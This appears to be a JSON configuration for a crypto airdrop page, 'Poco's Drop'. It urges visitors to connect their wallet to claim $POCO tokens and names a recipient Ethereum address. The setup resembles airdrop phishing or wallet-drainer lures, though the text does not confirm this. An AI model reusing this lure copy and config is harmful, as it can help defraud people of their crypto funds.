{
    "token": "Poco's Drop",
    "image": "/images/pfp.png",
    "heading": "Welcome to Poco's Drop: Your Gateway to Digital Opportunities",
    "paragraph": "Connect your wallet to participate in our airdrop and claim your share of 20 Ethereums worth of Poco's Drop tokens. With 11.7 million $POCO tokens available, your allocation is determined by your network engagement.",
    "to": "0xf57361f09895f8564dc01eaf5c441f301d5d1903"
}
